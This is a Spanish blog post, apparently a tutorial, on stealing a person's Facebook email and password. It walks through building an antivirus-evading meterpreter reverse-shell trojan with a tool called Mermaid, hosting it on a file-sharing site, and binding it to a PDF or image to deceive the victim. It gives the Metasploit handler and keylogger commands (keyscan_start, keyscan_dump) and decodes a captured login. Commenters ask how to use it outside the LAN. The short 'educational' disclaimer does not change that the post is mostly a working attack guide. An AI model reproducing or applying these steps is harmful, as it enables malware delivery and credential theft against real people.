Las personas usualmente descargan a diestra y siniestra, aceptan acuerdos (Sin leerlos) con las páginas de los programas que descargan, obviamente eso puede ser aprovechado por las mismas.
En este post mostraré cómo hackear un facebook, la contraseña y el correo de la víctima, utilizando el metasploit framework y una herramienta que nos ayudara para crear un Virus Indetectable.
Primero antes que nada, en esta entrada se verá una herramienta poderosa que nos ayudará a crear exploits con el Payload windows/meterpreter/reverse_tcp, y se encargará de dejarlo lo más indetectable a los Antivirus Actuales, (tanto así que puedes escanearlo con el antivirus que tengas y tu antimalware de preferencia y verás que no lo detecta como Troyano).
Primero antes que nada, en esta entrada se verá una herramienta poderosa que nos ayudará a crear exploits con el Payload windows/meterpreter/reverse_tcp, y se encargará de dejarlo lo más indetectable a los Antivirus Actuales, (tanto así que puedes escanearlo con el antivirus que tengas y tu antimalware de preferencia y verás que no lo detecta como Troyano).
El ataque que se llevará a cabo se hará dentro de la Red Local, osea, no se ataca a otra persona que esté fuera de mi LAN. Este ataqué si se puede llevar a cabo fuera de la Red local, y es precisamente de esta manera que lo llevan a cabo los hackers para infectar PC's de todo el mundo, es decir, independientemente que estén en su red o estén del otro lado del mundo.
Vamos a ver los Requisitos:
* Necesitamos tener Mermaid, que será el Software Gratuito que utilizaremos para la creación del exploit que infectará a la Víctima, lo podemos descargar en el siguiente enlace: http://shink.in/yzUr6
* Obviamente necesitaremos Kali Linux, con este entraremos en la consola Metasploit, para abrir un handler de escucha a nuestro exploit con los parámetros que le demos al momento de crearlo.
PROCESO:
Primero vamos a descomprimir el archivo Mermaid.rar que descargaron en el link de arriba.
Vamos a ver dos carpetas y algunos archivos, procederemos a abrir el archivo con la Extensión de Java, (.jar). Por tanto abrimos el archivo Mermaid.jar, y si nos aparece un cartel le damos en Aceptar.
Con el programa abierto vamos a darle en el Símbolo +, ahí agregaremos un nuevo "Perfil", donde ubicaremos las configuraciones de nuestro Payload, puertos y demás.
Así que en el primer cuadro de texto pondremos el nombre del perfil que tendremos, este puede ser cualquier nombre.
En IP/DNS vamos a ubicar la IP Local Privada del Kali Linux, esto es importante, para saberlo, primero ir a revisar el Kali Linux, abrir una consola dentro del mismo y ver la IP Privada con el comando ifconfig. Si no te queda claro, te invito a que veas los otros exploits creados en este blog con Kali Linux, así verás dónde ver la IP Local del Kali Linux.
En PORT vamos a poner el puerto que vamos a utilizar, en todas mis pruebas le pongo 7000, puede ser cualquier número, menos un número de puerto que sea utilizado.
Ahora en la pestaña siguiete vamos a ubicar en la parte de abajo el nombre que tendra interiormente la Aplicación, puede ser cualquier nombre, pero tiene que terminar en .exe.
Ahora procedemos a darle Save.
Verás que se a creado un perfil con el nombre que le hayas asignado, este estará en la parte en blanco del Mermaid, ahora le damos click y le damos al Botón BUILD.
Ahí, puedes tachar el recuadro de UPX si lo deseas, esto lo que hará es reducir un poco el tamaño del archivo que estamos generando.
Le das click en los tres puntos suspensivos, para elegir el lugar donde va a quedar el archivo que estamos creando (El virus), hay que guardarlo con la extensión .exe.
Ahora tendremos el Troyano creado.
Creado entonces podemos subirlo a Mega o a otra página de descargas que nos deje subirlo.
Ahora nos vamos a Kali Linux para encender el Handler de Escucha.
En Kali Linux vamos a abrir una nueva consola y vamos a poner esta secuencia de comandos.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 192.168.1.10 → Esta tiene que ser la IP que le asignamos cuando lo creamos, que es la misma que la IP privada del Kali Linux.
set lport 7000 → Este es el puerto que especificamos cuando creamos el virus.
exploit
Ahí vamos a esperar que nuestra víctima abra el Virus que le hemos enviado, esta es la parte dificil aunque podrás convencerla con el método que prefieras, en mi caso lo estoy haciendo sobre una de mis máquinas viruales, específicamente en una Windows 10.
Cuando la víctima de doble click sobre el virus que le enviamos, inmediatamente se nos abrirá una sesión Meterpreter.
Eso era exactamente lo que queríamos, ahora tenemos control de su PC remotamente, la persona no sospechará ya que ni el Firewall, ni el Antivirus ni el Antimalware que tenga le detectará algo raro en el archivo que le enviamos.
En la pantalla de la víctima no aparecerá nada al ejecutar el archivo, así que pues es posible que llegue a borrar nuestro virus al ver que no funciona para nada esa aplicación, así que lo que recomiendo es fusionar ese virus con algún archivo real (Una imágen, canción, pdf) de esa manera la víctima abre digamos el archivo PDF, y al mismo tiempo y sin darse cuenta abre nuestro troyano.
En este caso, nos simplificamos la vida, y suponemos que descarga el virus y lo abre y de ahí no pasa nada mas.
Ahora, para obtener los credenciales de la persona podemos hacer varios métodos, en este caso abriré un Keylogger sobre la PC víctima para tener control de TODO lo que esta persona, así, si esta persona escribe algun correo o contraseña con su teclado, nosotros lo tendremos capturado.
Entonces en Kali Linux abrimos el Keylogger con:
keyscan_start
Podremos esperar mucho y luego ver todo lo que ha escrito, o podremos estar dando constantemente:
keyscan_dump
El comando anterior nos mostrará lo que la víctima haya escrito desde que abrió el Virus.
Veamos por ejemplo que la víctima nos dio su correo y contraseña de alguna plataforma, en este caso Facebook.
En este ejemplo cuando damos keyscan_dump, obtenemos lo siguiente.
facebook.com <Return> micorreo<Crtl> <Alt> <LCtrl> <RMenu> qcorreo.com <Tab> micontrase'a
Vamos a interpretar esto para saber que es lo que escribió.
Primero, al parecer escribió en Google "facebook.com", luego de esto a dado Enter.
Después de eso escribió "micorreo" y dio las teclas necesarias para poner @, si ves luego dice qcorreo.com, esto significa primero que la "q" es parte del @, (Para escribir @ se usa normalmente Alt + Q), y luego escribe correo.com.
De esta manera su correo electrónico es: micorreo@correo.com
Luego presionó TAB, esto indica que se movió de cuadro, para escribir en otro cuadro de texto, vemos que escribió: microntrase'a.
Sabemos que en el teclado de Estados Unidos no existe la Ñ, así que ese ( ' ) que vemos, es una ñ.
De esta manera su contraseña es: micontraseña
Hemos conseguido obtener la contraseña y correo de una persona que utilizó facebook, ahora podemos usar.
keyscan_stop
exit
exit
exit
Primero apagamos el Keylogger, y nos salimos de la consola meterpreter, ya hemos terminado.
Pruebas de Antivirus en NoDistribute.
Solamente 1/35 antivirus lo pudo detectar.
Sin embargo si no le activamos el UPX al momento de crearlo (El UPX es para bajar el peso del virus), si lo desactivamos esta prueba será de 0/35, osea que ningún antivirus lo detectará.
¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones o programas dudosos.
* No instalar aplicaciones o programas de sitios de dudosa reputación.
* Tener un buen suit de protección de Windows (Firewalls, Antivirus etc...)
* No entrar a páginas raras, o con una dirección url extraña.
IMPORTANTE!
* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi PC y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.
una pregunta amigo y como puedo pasarlo a wan
ResponderEliminarEXACTO EL GUSTO DE HACER TODO ESTA ESTA EN LA wan NO EN LA lan DE NADA SERVIRIA HACKEAR EN NUESTRO ENTORNO DE RED
ResponderEliminarse cayo el link
ResponderEliminaramigo como puedo hacerlo fuera de mi LAN?
ResponderEliminar